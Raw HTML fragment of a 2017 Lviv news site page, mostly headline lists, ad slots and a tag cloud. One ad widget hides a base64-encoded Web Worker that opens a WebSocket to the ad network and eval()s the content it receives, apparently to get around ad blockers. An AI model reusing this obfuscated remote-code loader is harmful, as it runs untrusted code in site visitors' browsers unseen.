title="Google+" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd a2a_counter addtoany_share_save" href="https://www.addtoany.com/share"></a></div></div><!-- Facebook Comments Plugin for WordPress: http://peadig.com/wordpress-plugins/facebook-comments/ --><div class="fb-comments" data-href="http://gazeta.lviv.ua/2017/12/06/prezident-pidpisav-zakon-pro-zhitlovo-komunalni-poslugi/" data-numposts="20" data-width="100%" data-colorscheme="light"></div>                    </div>

<!--end-->


                    <div class="single-ads-wrap"><aside class="all-devices  ads-widget gazet-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Банер під статею -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9951724072058821"
     data-ad-slot="5412064588"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></aside><aside id="black-studio-tinymce-29" class="all-devices  ads-widget widget_black_studio_tinymce">реклама<div class="textwidget"><div id="riainfo_56108fd8d1a24d996679d8cb597acd6d"></div>
<p><script type="text/javascript" src="https://cobrand.ria.com/js/ria_informer.js?riacode=56108fd8d1a24d996679d8cb597acd6d" ></script></p>
<p>
<script id="r18284" type="text/javascript">
    (function() {
        var worker18284,
            tickerID = 18284,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);
        var script = document.createElement('script');
            script.src = '//js-goods.redtram.com/0/18/ticker_18284.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;
                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9nNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKC95YW5kZXh8eWFicm93c2VyL2kudGVzdChuYXZpZ2F0b3IudXNlckFnZW50KSkgd3NzVXJsID0gIndzczovL2c0cC5ncnQwMS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';
                function runExternalMessage(data) {
                    worker18284.postMessage(data);
                }
                worker18284 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));
                worker18284.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };
                worker18284.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script></p>
</div></aside></div>
					<div class="entry-tags">Позначки: <a href="http://gazeta.lviv.ua/tag/zakon/" rel="tag">закон</a></div>                </div>
            </div>
            
    <div class="column_left"><aside id="left-news-widget-2" class="all-devices  widget left_news_widget"><div class="widget_title"><a href="http://gazeta.lviv.ua/novini/">Новини</a></div><div class="widget_content"><div class="news-posts-list"><div class="post-item news-item strong"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-12-06T15:15:53+00:00">15:15, Ср. - 06 Гру. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/12/06/p-yat-idej-originalnix-podarunkiv-na-mikolaya/">П’ять ідей оригінальних подарунків на Миколая</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-12-06T14:45:34+00:00">14:45, Ср. - 06 Гру. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/12/06/nastupnogo-tizhnya-pidib-yut-pidsumki-radiodiktantu-nacionalnoyi-yednosti/">Наступного тижня підіб’ють підсумки радіодиктанту національної єдності</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-12-06T14:17:05+00:00">14:17, Ср. - 06 Гру. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/12/06/kilkist-xvorix-na-grip-ta-grvi-na-lvivshhini-zrosla/">Понад половина хворих на грип та ГРВІ на Львівщині – діти</a></h3></div></div><div class="post-item post-news-item strong"><div class="thumb"><a href="http://gazeta.lviv.ua/2017/12/04/cogorich-golovna-yalinka-distalas-lvovu-bezkoshtovno/"><img width="300" height="180" src="http://gazeta.lviv.ua/wp-content/uploads/2017/12/portal.lviv_.ua_yalinka-i-yarmarok_-300x180.jpg" class="attachment-post-thumb size-post-thumb wp-post-image" alt="" /></a></div><div class="entry">
			<h3><a href="http://gazeta.lviv.ua/2017/12/04/cogorich-golovna-yalinka-distalas-lvovu-bezkoshtovno/">Цьогоріч головна ялинка дісталася Львову безкоштовно</a></h3><div class="item-meta">
				<time class="item-date" datetime="2017-12-04T12:27:05+00:00">12:27, Пн. - 04 Гру. 2017</time>&nbsp;<span class="item-views"><i class="fa fa-eye"></i> 2083</span>&nbsp;<span class="item-comments fb-comments-count" data-href="http://gazeta.lviv.ua/2017/12/04/cogorich-golovna-yalinka-distalas-lvovu-bezkoshtovno/"></span></div>
		</div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-12-06T14:05:52+00:00">14:05, Ср. - 06 Гру. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/12/06/vikonkom-zatverdiv-viplatu-odnorazovoyi-dopomogi-v-rozmiri-100-tis-grn-dlya-49-voyiniv-ato-prizvishha/">Виконком затвердив виплату одноразової допомоги в розмірі 100 тис. грн. для 49 воїнів АТО (прізвища)</a></h3></div></div><div class="post-item news-item strong"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-12-06T13:35:07+00:00">13:35, Ср. - 06 Гру. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/12/06/zavtra-lvova-privezut-tilo-viktora-matyuxina-yakij-zaginuv-na-donbasi/">Завтра до Львова привезуть тіло Віктора Матюхіна, який загинув на Донбасі</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-12-06T13:02:46+00:00">13:02, Ср. - 06 Гру. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/12/06/u-lvovi-zminili-kerivnikiv-rajonnix-administracij/">У Львові змінили керівників районних адміністрацій</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-12-06T12:35:59+00:00">12:35, Ср. - 06 Гру. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/12/06/u-den-zsu-vijskovosluzhbovci-otrimali-pozashlyaxovik/">У День ЗСУ військовослужбовці отримали позашляховик</a></h3></div></div><div class="post-item news-item strong"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-12-06T12:21:18+00:00">12:21, Ср. - 06 Гру. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/12/06/prezident-pidpisav-zakon-pro-zhitlovo-komunalni-poslugi/">Президент підписав закон «Про житлово-комунальні послуги»</a></h3></div></div><div class="post-item news-item"><div class="entry advertising"><div class="item-meta">
				<time class="item-date" datetime="2017-12-06T11:57:01+00:00">11:57, Ср. - 06 Гру. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/12/06/privatbank-pidklyuchiv-groshovi-perekazi-welsend/">ПриватБанк підключив грошові перекази Welsend</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-12-06T11:40:09+00:00">11:40, Ср. - 06 Гру. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/12/06/minuloyi-dobi-leleki-prinesli-u-lvivski-rodini-23-nemovlyat/">Минулої доби лелеки принесли у львівські родини 23 немовлят</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-12-06T11:19:24+00:00">11:19, Ср. - 06 Гру. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/12/06/zaborona-na-v-yizd-sheremeti-polshhi-zalishayetsya-v-sili-vashhikovskij/">«Заборона на в&#8217;їзд Шереметі до Польщі залишається в силі», – Ващиковський</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-12-06T10:51:07+00:00">10:51, Ср. - 06 Гру. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/12/06/na-kordoni-z-polshheyu-viyavili-ford-iz-pidroblenim-vin-nomerom/">На кордоні з Польщею виявили Ford із підробленим VIN-номером</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-12-06T10:33:36+00:00">10:33, Ср. - 06 Гру. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/12/06/lvivshhina-spivpracyuvatime-z-kitajskoyu-provinciyeyu-sichuan/">Львівщина співпрацюватиме з китайською провінцією Сичуань</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-12-06T10:08:31+00:00">10:08, Ср. - 06 Гру. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/12/06/na-lvivshhini-pid-kolesami-avtomobilya-zaginuv-pishoxid-2/">На Львівщині під колесами автомобіля загинув пішохід</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-12-06T09:31:19+00:00">09:31, Ср. - 06 Гру. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/12/06/u-malexovi-zgoriv-magazin-foto/">У Малехові згорів магазин (фото)</a></h3></div></div><div class="post-item news-item strong"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-12-06T09:00:18+00:00">09:00, Ср. - 06 Гру. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/12/06/sogodni-vidznachayemo-den-zbrojnix-sil-ukrayini/">Сьогодні відзначаємо День Збройних сил України</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-12-05T21:15:59+00:00">21:15, Вт. - 05 Гру. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/12/05/sinoptiki-prognozuyut-zavtra-na-dorogax-ozheledicyu-mokrij-snig-doshh/">Синоптики прогнозують завтра на дорогах ожеледицю, мокрий сніг і дощ</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-12-05T20:53:54+00:00">20:53, Вт. - 05 Гру. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/12/05/u-lvovi-vidkrili-usmishku-dlya-lyudej-iz-glibokoyu-rozumovoyu-nepovnospravnistyu/">У Львові відкрили «Усмішку» для людей із глибокою розумовою неповносправністю</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-12-05T20:18:06+00:00">20:18, Вт. - 05 Гру. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/12/05/facebook-prezentuvav-mesendzher-dlya-ditej/">Facebook презентував месенджер для дітей</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-12-05T19:41:41+00:00">19:41, Вт. - 05 Гру. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/12/05/12-pesikiv-z-lkp-lev-mriyut-pro-teplu-domivku/">12 песиків з ЛКП «Лев» мріють про теплу домівку</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-12-05T19:02:59+00:00">19:02, Вт. - 05 Гру. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/12/05/u-miskradi-vidkriyut-vistavku-dityachix-robit-zolotij-molbert-2017/">У міськраді відкриють виставку дитячих робіт «Золотий мольберт 2017»</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-12-05T18:24:31+00:00">18:24, Вт. - 05 Гру. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/12/05/u-sheginyax-zatrimali-chotirox-ukrayinciv-iz-pidroblenimi-dokumentami/">У Шегинях затримали чотирьох українців із підробленими документами</a></h3></div></div><div class="post-item news-item strong"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-12-05T17:55:48+00:00">17:55, Вт. - 05 Гру. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/12/05/dzhungli-p-yavki-bosi-fermeri-silske-gospodarstvo-na-shri-lanci/">Джунглі, п&#8217;явки і босі фермери – сільське господарство на Шрі-Ланці</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-12-05T17:31:13+00:00">17:31, Вт. - 05 Гру. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/12/05/nastupnogo-roku-32-dityam-sirotam-zakuplyat-vlasne-zhitlo/">Наступного року 32 дітям-сиротам закуплять власне житло</a></h3></div></div><div class="post-item news-item"><div class="entry"><div class="item-meta">
				<time class="item-date" datetime="2017-12-05T16:58:08+00:00">16:58, Вт. - 05 Гру. 2017</time></div><h3><a href="http://gazeta.lviv.ua/2017/12/05/ne-vpasti-na-lodu-yak-pishoxodam-vberegtisya-pid-chas-ozheledici/">Не впасти на льоду. Як пішоходам вберегтися під час ожеледиці</a></h3></div></div></div></div></aside></div>
        </div>
        
    <div class="column_right"><aside id="spec-project-widget-3" class="all-devices  widget spec_project_widget"><div class="widget_title">Суспільство</div><div class="widget_content"><div class="spec_item clearfix"><div class="thumb"><a href="http://gazeta.lviv.ua/2017/11/30/shkola-dlya-nestora-chi-xochut-uchiteli-lvivshhini-navchati-ditej-z-osoblivimi-potrebami/"><img src="http://gazeta.lviv.ua/wp-content/uploads/2017/11/882420_1746183538943677_2324539883952505170_o.jpg" alt="Школа для Нестора. Чи хочуть учителі Львівщини навчати дітей з особливими потребами?"></a></div><div class="entry"><a href="http://gazeta.lviv.ua/2017/11/30/shkola-dlya-nestora-chi-xochut-uchiteli-lvivshhini-navchati-ditej-z-osoblivimi-potrebami/">Школа для Нестора. Чи хочуть учителі Львівщини навчати дітей з особливими потребами?</a></div></div></div></aside><aside class="all-devices  widget gazet-widget"><a href="http://www.moyo.ua" target="_blank"><img width="300" height="250" src='http://gazeta.lviv.ua/wp-content/uploads/2017/04/moyoopt.gif' alt='' title='moyoopt' /></a></aside><aside id="posts-by-tags-widget-2" class="all-devices purple-border widget category_posts_widget"><div class="widget_title">Читайте також</div><div class="widget_content"><div class="category-posts-list"><div class="post-item"><div class="thumb"><a href="http://gazeta.lviv.ua/2017/11/29/poroshenko-pidpisav-zakon-pro-vixidnij-25-grudnya/"><img width="300" height="180" src="http://gazeta.lviv.ua/wp-content/uploads/2017/11/1813690-300x180.jpg" class="attachment-post-thumb size-post-thumb wp-post-image" alt="" /></a></div><div class="entry">
			<h3><a href="http://gazeta.lviv.ua/2017/11/29/poroshenko-pidpisav-zakon-pro-vixidnij-25-grudnya/">Порошенко підписав закон про вихідний 25 грудня</a></h3><div class="item-meta">
				<time class="item-date" datetime="2017-11-29T16:38:57+00:00">16:38, Ср. - 29 Лис. 2017</time>&nbsp;|&nbsp;
					<span class="item-author"></span>&nbsp;<span class="item-views"><i class="fa fa-eye"></i> 1098</span>&nbsp;<span class="item-comments fb-comments-count" data-href="http://gazeta.lviv.ua/2017/11/29/poroshenko-pidpisav-zakon-pro-vixidnij-25-grudnya/"></span></div>
		</div></div><div class="post-item"><div class="thumb"><a href="http://gazeta.lviv.ua/2017/09/25/prezident-pidpisav-zakon-ukrayini-pro-osvitu/"><img width="300" height="180" src="http://gazeta.lviv.ua/wp-content/uploads/2017/09/zakon-300x180.jpeg" class="attachment-post-thumb size-post-thumb wp-post-image" alt="" /></a></div><div class="entry">
			<h3><a href="http://gazeta.lviv.ua/2017/09/25/prezident-pidpisav-zakon-ukrayini-pro-osvitu/">Президент підписав Закон України «Про освіту»</a></h3><div class="item-meta">
				<time class="item-date" datetime="2017-09-25T21:17:19+00:00">21:17, Пн. - 25 Вер. 2017</time>&nbsp;|&nbsp;
					<span class="item-author"></span>&nbsp;<span class="item-views"><i class="fa fa-eye"></i> 802</span>&nbsp;<span class="item-comments fb-comments-count" data-href="http://gazeta.lviv.ua/2017/09/25/prezident-pidpisav-zakon-ukrayini-pro-osvitu/"></span></div>
		</div></div><div class="post-item"><div class="thumb"><a href="http://gazeta.lviv.ua/2017/09/13/poslam-krayin-yes-roz-yasnyat-ukrayinskij-zakon-pro-osvitu/"><img width="300" height="180" src="http://gazeta.lviv.ua/wp-content/uploads/2017/09/630_360_1494946944-8326-300x180.jpg" class="attachment-post-thumb size-post-thumb wp-post-image" alt="" /></a></div><div class="entry">
			<h3><a href="http://gazeta.lviv.ua/2017/09/13/poslam-krayin-yes-roz-yasnyat-ukrayinskij-zakon-pro-osvitu/">Послам країн ЄС роз’яснять український закон «Про освіту»</a></h3><div class="item-meta">
				<time class="item-date" datetime="2017-09-13T09:02:23+00:00">09:02, Ср. - 13 Вер. 2017</time>&nbsp;|&nbsp;
					<span class="item-author"></span>&nbsp;<span class="item-views"><i class="fa fa-eye"></i> 494</span>&nbsp;<span class="item-comments fb-comments-count" data-href="http://gazeta.lviv.ua/2017/09/13/poslam-krayin-yes-roz-yasnyat-ukrayinskij-zakon-pro-osvitu/"></span></div>
		</div></div></div></div></aside><aside id="category-posts-widget-3" class="all-devices purple-border widget category_posts_widget"><div class="widget_title"><a href="http://gazeta.lviv.ua/novini/">Новини</a></div><div class="widget_content"><div class="category-posts-list"><div class="post-item"><div class="thumb"><a href="http://gazeta.lviv.ua/2017/12/06/p-yat-idej-originalnix-podarunkiv-na-mikolaya/"><img width="300" height="180" src="http://gazeta.lviv.ua/wp-content/uploads/2017/12/im-image-300x180.jpg" class="attachment-post-thumb size-post-thumb wp-post-image" alt="" /></a></div><div class="entry">
			<h3><a href="http://gazeta.lviv.ua/2017/12/06/p-yat-idej-originalnix-podarunkiv-na-mikolaya/">П’ять ідей оригінальних подарунків на Миколая</a></h3><div class="item-meta">
				<time class="item-date" datetime="2017-12-06T15:15:53+00:00">15:15, Ср. - 06 Гру. 2017</time>&nbsp;|&nbsp;
					<span class="item-author"><a href="http://gazeta.lviv.ua/author/dzyama/">Тетяна Дзяма</a></span>&nbsp;<span class="item-views"><i class="fa fa-eye"></i> 48</span>&nbsp;<span class="item-comments fb-comments-count" data-href="http://gazeta.lviv.ua/2017/12/06/p-yat-idej-originalnix-podarunkiv-na-mikolaya/"></span></div>
		</div></div><div class="post-item"><div class="thumb"><a href="http://gazeta.lviv.ua/2017/12/06/nastupnogo-tizhnya-pidib-yut-pidsumki-radiodiktantu-nacionalnoyi-yednosti/"><img width="300" height="180" src="http://gazeta.lviv.ua/wp-content/uploads/2017/11/hqdefault-1-300x180.jpg" class="attachment-post-thumb size-post-thumb wp-post-image" alt="" /></a></div><div class="entry">
			<h3><a href="http://gazeta.lviv.ua/2017/12/06/nastupnogo-tizhnya-pidib-yut-pidsumki-radiodiktantu-nacionalnoyi-yednosti/">Наступного тижня підіб’ють підсумки радіодиктанту національної єдності</a></h3><div class="item-meta">
				<time class="item-date" datetime="2017-12-06T14:45:34+00:00">14:45, Ср. - 06 Гру. 2017</time>&nbsp;|&nbsp;
					<span class="item-author"></span>&nbsp;<span class="item-views"><i class="fa fa-eye"></i> 48</span>&nbsp;<span class="item-comments fb-comments-count" data-href="http://gazeta.lviv.ua/2017/12/06/nastupnogo-tizhnya-pidib-yut-pidsumki-radiodiktantu-nacionalnoyi-yednosti/"></span></div>
		</div></div><div class="post-item"><div class="thumb"><a href="http://gazeta.lviv.ua/2017/12/06/kilkist-xvorix-na-grip-ta-grvi-na-lvivshhini-zrosla/"><img width="300" height="180" src="http://gazeta.lviv.ua/wp-content/uploads/2017/12/gryp-e1480405404582-300x180.jpg" class="attachment-post-thumb size-post-thumb wp-post-image" alt="" /></a></div><div class="entry">
			<h3><a href="http://gazeta.lviv.ua/2017/12/06/kilkist-xvorix-na-grip-ta-grvi-na-lvivshhini-zrosla/">Понад половина хворих на грип та ГРВІ на Львівщині – діти</a></h3><div class="item-meta">
				<time class="item-date" datetime="2017-12-06T14:17:05+00:00">14:17, Ср. - 06 Гру. 2017</time>&nbsp;|&nbsp;
					<span class="item-author"></span>&nbsp;<span class="item-views"><i class="fa fa-eye"></i> 69</span>&nbsp;<span class="item-comments fb-comments-count" data-href="http://gazeta.lviv.ua/2017/12/06/kilkist-xvorix-na-grip-ta-grvi-na-lvivshhini-zrosla/"></span></div>
		</div></div></div></div></aside><aside class="all-devices  widget gazet-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Хмарочос -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:600px"
     data-ad-client="ca-pub-9951724072058821"
     data-ad-slot="3155590425"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></aside><aside id="tag_cloud-2" class="all-devices purple-border widget widget_tag_cloud"><div class="widget_title">Позначки</div><div class="tagcloud"><a href="http://gazeta.lviv.ua/tag/ato/" class="tag-cloud-link tag-link-682 tag-link-position-1" style="font-size: 9.4141414141414pt;" aria-label="АТО (102 елементи)">АТО</a>
<a href="http://gazeta.lviv.ua/tag/dsns/" class="tag-cloud-link tag-link-265 tag-link-position-2" style="font-size: 12.737373737374pt;" aria-label="ДСНС (301 елемент)">ДСНС</a>
<a href="http://gazeta.lviv.ua/tag/dtp/" class="tag-cloud-link tag-link-67 tag-link-position-3" style="font-size: 15.070707070707pt;" aria-label="ДТП (645 елементів)">ДТП</a>
<a href="http://gazeta.lviv.ua/tag/dfs/" class="tag-cloud-link tag-link-1258 tag-link-position-4" style="font-size: 10.050505050505pt;" aria-label="ДФС (126 елементів)">ДФС</a>
<a href="http://gazeta.lviv.ua/tag/ekonomika/" class="tag-cloud-link tag-link-2074 tag-link-position-5" style="font-size: 9.5555555555556pt;" aria-label="Економіка (107 елементів)">Економіка</a>
<a href="http://gazeta.lviv.ua/tag/lkp-lev/" class="tag-cloud-link tag-link-160 tag-link-position-6" style="font-size: 8.2828282828283pt;" aria-label="ЛКП Лев (70 елементів)">ЛКП Лев</a>
<a href="http://gazeta.lviv.ua/tag/lmr/" class="tag-cloud-link tag-link-276 tag-link-position-7" style="font-size: 9.1313131313131pt;" aria-label="ЛМР (93 елементи)">ЛМР</a>
<a href="http://gazeta.lviv.ua/tag/loda/" class="tag-cloud-link tag-link-232 tag-link-position-8" style="font-size: 13.30303030303pt;" aria-label="ЛОДА (366 елементів)">ЛОДА</a>
<a href="http://gazeta.lviv.ua/tag/lvivska-filarmoniya/" class="tag-cloud-link tag-link-262 tag-link-position-9" style="font-size: 9.0606060606061pt;" aria-label="Львівська філармонія (91 елемент)">Львівська філармонія</a>
<a href="http://gazeta.lviv.ua/tag/lvivski-novini/" class="tag-cloud-link tag-link-2043 tag-link-position-10" style="font-size: 22pt;" aria-label="Львівські новини (6&nbsp;154 елементи)">Львівські новини</a>
<a href="http://gazeta.lviv.ua/tag/misto/" class="tag-cloud-link tag-link-1776 tag-link-position-11" style="font-size: 10.262626262626pt;" aria-label="Місто (135 елементів)">Місто</a>
<a href="http://gazeta.lviv.ua/tag/narodnij-kontrol/" class="tag-cloud-link tag-link-2344 tag-link-position-12" style="font-size: 8.6363636363636pt;" aria-label="Народний контроль (78 елементів)">Народний контроль</a>
<a href="http://gazeta.lviv.ua/tag/privatbank/" class="tag-cloud-link tag-link-87 tag-link-position-13" style="font-size: 10.616161616162pt;" aria-label="ПриватБанк (149 елементів)">ПриватБанк</a>
<a href="http://gazeta.lviv.ua/tag/sbu/" class="tag-cloud-link tag-link-636 tag-link-position-14" style="font-size: 9.1313131313131pt;" aria-label="СБУ (92 елементи)">СБУ</a>
<a href="http://gazeta.lviv.ua/tag/suspilstvo/" class="tag-cloud-link tag-link-2480 tag-link-position-15" style="font-size: 16.20202020202pt;" aria-label="Суспільство (925 елементів)">Суспільство</a>
<a href="http://gazeta.lviv.ua/tag/uku/" class="tag-cloud-link tag-link-197 tag-link-position-16" style="font-size: 8.2121212121212pt;" aria-label="УКУ (68 елементів)">УКУ</a>
<a href="http://gazeta.lviv.ua/tag/avto/" class="tag-cloud-link tag-link-77 tag-link-position-17" style="font-size: 9.0606060606061pt;" aria-label="авто (90 елементів)">авто</a>
<a href="http://gazeta.lviv.ua/tag/aeroport/" class="tag-cloud-link tag-link-521 tag-link-position-18" style="font-size: 8pt;" aria-label="аеропорт (63 елементи)">аеропорт</a>
<a href="http://gazeta.lviv.ua/tag/vistavka/" class="tag-cloud-link tag-link-140 tag-link-position-19" style="font-size: 9.6262626262626pt;" aria-label="виставка (108 елементів)">виставка</a>
<a href="http://gazeta.lviv.ua/tag/departament-z-pitan-civilnogo-zaxistu-loda/" class="tag-cloud-link tag-link-480 tag-link-position-20" style="font-size: 10.262626262626pt;" aria-label="департамент з питань цивільного захисту ЛОДА (133 елементи)">департамент з питань цивільного захисту ЛОДА</a>
<a href="http://gazeta.lviv.ua/tag/ekologiya/" class="tag-cloud-link tag-link-2487 tag-link-position-21" style="font-size: 8.8484848484848pt;" aria-label="екологія (84 елементи)">екологія</a>
<a href="http://gazeta.lviv.ua/tag/za-kordonom/" class="tag-cloud-link tag-link-2525 tag-link-position-22" style="font-size: 9.5555555555556pt;" aria-label="за кордоном (105 елементів)">за кордоном</a>
<a href="http://gazeta.lviv.ua/tag/zdorov-ya/" class="tag-cloud-link tag-link-1688 tag-link-position-23" style="font-size: 11.606060606061pt;" aria-label="здоров&#039;я (208 елементів)">здоров&#039;я</a>
<a href="http://gazeta.lviv.ua/tag/konkurs/" class="tag-cloud-link tag-link-73 tag-link-position-24" style="font-size: 9.5555555555556pt;" aria-label="конкурс (106 елементів)">конкурс</a>
<a href="http://gazeta.lviv.ua/tag/kontrabanda/" class="tag-cloud-link tag-link-309 tag-link-position-25" style="font-size: 8.1414141414141pt;" aria-label="контрабанда (67 елементів)">контрабанда</a>
<a href="http://gazeta.lviv.ua/tag/kradizhka/" class="tag-cloud-link tag-link-64 tag-link-position-26" style="font-size: 13.090909090909pt;" aria-label="крадіжка (336 елементів)">крадіжка</a>
<a href="http://gazeta.lviv.ua/tag/kultura/" class="tag-cloud-link tag-link-1663 tag-link-position-27" style="font-size: 11.181818181818pt;" aria-label="культура (183 елементи)">культура</a>
<a href="http://gazeta.lviv.ua/tag/kuxnya/" class="tag-cloud-link tag-link-207 tag-link-position-28" style="font-size: 8.0707070707071pt;" aria-label="кухня (65 елементів)">кухня</a>
<a href="http://gazeta.lviv.ua/tag/lvivska-oblasna-rada/" class="tag-cloud-link tag-link-2241 tag-link-position-29" style="font-size: 10.616161616162pt;" aria-label="львівська обласна рада (150 елементів)">львівська обласна рада</a>
<a href="http://gazeta.lviv.ua/tag/osvita/" class="tag-cloud-link tag-link-958 tag-link-position-30" style="font-size: 9.7676767676768pt;" aria-label="освіта (113 елементів)">освіта</a>
<a href="http://gazeta.lviv.ua/tag/pogoda/" class="tag-cloud-link tag-link-195 tag-link-position-31" style="font-size: 10.686868686869pt;" aria-label="погода (154 елементи)">погода</a>
<a href="http://gazeta.lviv.ua/tag/pozhezha/" class="tag-cloud-link tag-link-111 tag-link-position-32" style="font-size: 12.737373737374pt;" aria-label="пожежа (301 елемент)">пожежа</a>
<a href="http://gazeta.lviv.ua/tag/policiya/" class="tag-cloud-link tag-link-68 tag-link-position-33" style="font-size: 16.414141414141pt;" aria-label="поліція (991 елемент)">поліція</a>
<a href="http://gazeta.lviv.ua/tag/prikordonniki/" class="tag-cloud-link tag-link-359 tag-link-position-34" style="font-size: 12.383838383838pt;" aria-label="прикордонники (271 елемент)">прикордонники</a>
<a href="http://gazeta.lviv.ua/tag/prokuratura-lvivskoyi-oblasti/" class="tag-cloud-link tag-link-1041 tag-link-position-35" style="font-size: 11.464646464646pt;" aria-label="прокуратура (199 елементів)">прокуратура</a>
<a href="http://gazeta.lviv.ua/tag/remont-dorig/" class="tag-cloud-link tag-link-2893 tag-link-position-36" style="font-size: 8.9191919191919pt;" aria-label="ремонт доріг (87 елементів)">ремонт доріг</a>
<a href="http://gazeta.lviv.ua/tag/svyato/" class="tag-cloud-link tag-link-2583 tag-link-position-37" style="font-size: 9.6969696969697pt;" aria-label="свято (110 елементів)">свято</a>
<a href="http://gazeta.lviv.ua/tag/smert/" class="tag-cloud-link tag-link-2556 tag-link-position-38" style="font-size: 9.0606060606061pt;" aria-label="смерть (91 елемент)">смерть</a>
